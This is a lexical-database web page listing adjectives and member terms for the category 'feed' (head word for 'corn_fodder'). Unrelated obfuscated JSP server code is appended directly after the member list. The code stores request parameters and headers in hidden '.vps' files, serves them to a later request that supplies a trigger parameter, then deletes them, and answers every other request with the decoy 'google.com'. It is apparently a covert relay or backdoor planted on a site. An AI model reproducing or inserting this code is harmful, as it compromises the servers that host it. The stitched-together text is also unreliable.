Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
corn_fodder
with head word
feed
:
alternative:feed,
local:feed,
Category Nuances matching
feed
:
sweet,
suitable,
animal,
fibrous,
extra,
basic,
natural,
supplementary,
ruminant,
dry,
standard,
ordinary,
fresh,
thicker,
digestible,
solid,
good,
rich,
prepared,
artificial,
supplemental,
fine,
hot,
bitter,
lush,
traditional,
bulky,
individual,
alternative,
dried,
mixed,
laxative,
simple,
typical,
regular,
new,
light,
palatable,
hard,
available,
secondary,
granular,
dietary,
nutritious,
enteral,
cheaper,
starchy,
little,
important,
cheap,
soft,
heavy,
nutritive,
organic,
abundant,
moist,
grown,
coarse,
inert,
sized,
local,
fattening,
liquid,
domestic,
seasonal,
damp,
commercial,
stock,
dense,
proteinaceous,
expensive,
conventional,
wet,
fossil,
additional,
warm,
concentrated,
Members for simple category
feed
:
porridge,
horse_feed,
cereal_grain,
grain,
hay,
molasses,
mixed_feed,
silage,
corn,
stover,
grass,
winter_forage,
roughage,
wheat_feed,
peanut_cake,
fodder,
compost_tea,
undiluted_molasses,
feed_concentrate,
legume_pasture,
barley,
pasta,
starter,
oat,
concentrate,
manufactured_feed,
corn_mixture,
maize_meal,
dry_feed,
cereal_bran,
cereal_meal,
tomato_food,
pet_feed,
related_feed,
alfalfa,
mill_feed,
vitamin,
vegetable_diet,
senior_diet,
synthetic_feed,
millet,
sorghum_bran,
sugar,
cheese,
low-quality_forage,
groundnut_meal,
fish_feed,
corn_bran,
yogurt,
coarse_grain,
sorghum,
whole_oat,
cereal,
copra_meal,
soup,
hominy_feed,
gelatin,
beet_molasses,
scrambled_egg,
red_millet,
calf_feed,
grass_hay,
corn_silage,
fresh_grass,
mixture,
fattening_feed,
animal_chow,
liquid_comfrey,
potato,
honey,
ground_hay,
barley_grain,
stale_bread,
sweet_potato,
natural_grass,
green_barley,
whole_corn,
salmon_food,
pasture_grass,
yellow_corn,
filter_cake,
dry_grain,
pet-food_ration,
calf_starter,
palm-kernel_meal,
rye,
hominy,
hays,
whey,
dairy_meal,
fish_formula,
bran,
buckwheat,
mold,
micronutrient,
cake,
pulpy_juice,
water,
brewer_grain,
heavier_feed,
pig_feed,
oilseed_meal,
wild_rice,
grain_hay,
cob_corn,
egg_custard,
clover_hay,
bone_meal,
oat_hay,
rapeseed_meal,
canola_meal,
pasture,
chicken_formula,
mixed_food,
shrimp_feed,
linseed_meal,
dry_corn,
nectar,
bean_cake,
maize_bran,
gluten_meal,
sauerkraut,
medical_feed,
swine_feed,
paddy_grain,
broken_rice,
whole_grain,
sweet_whey,
food,
buckwheat_dough,
soybean_hay,
dry_grass,
mineral_premix,
dry_oat,
oilseed_cake,
dried_molasses,
paste,
rice_bran,
grass_silage,
gas-oil_feed,
prepared_feed,
legume_hays,
paddy,
byproduct_feed,
wheat,
maize_silage,
limestone_flour,
protein_feed,
soy_meal,
corn_grain,
response_feed,
lucerne_alfalfa,
corn-gluten_feed,
petroleum_feed,
range_cake,
soya_meal,
green_pasture,
crushed_oat,
scratch_feed,
dog_feed,
rice,
meal,
cattle_feed,
dried_alfalfa,
ground_roughage,
sorghum_grain,
linseed-oil_meal,
poultry_feed,
cattle_fodder,
high_grain,
petroleum_coke,
feed_wheat,
algae_paste,
terrestrial_grass,
hen_feed,
conserved_forage,
pet-food,
cereal_silage,
coke,
blighted_grain,
comfrey,
organic_oat,
citrus_molasses,
soybean_cake,
lush_pasture,
lucerne_hay,
grasshopper,
corn_fodder,
egg,
wheat_bran,
breakfast_cereal,
rye_grain,
grain_corn,
certain_grain,
grain_mixture,
cottonseed_meal,
dry_pasture,
battery_paste,
sweet_feed,
pet_coke,
distiller_grain,
long_hay,
forage,
mixer,
sloppy_bran,
cornmeal,
soy,
bread,
ground_oat,
alfalfa_hay,
flour,
corn_stover,
milk,
garlic,
salt,
fish_food,
meat_meal,
dairy_feed,
sunflower_meal,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>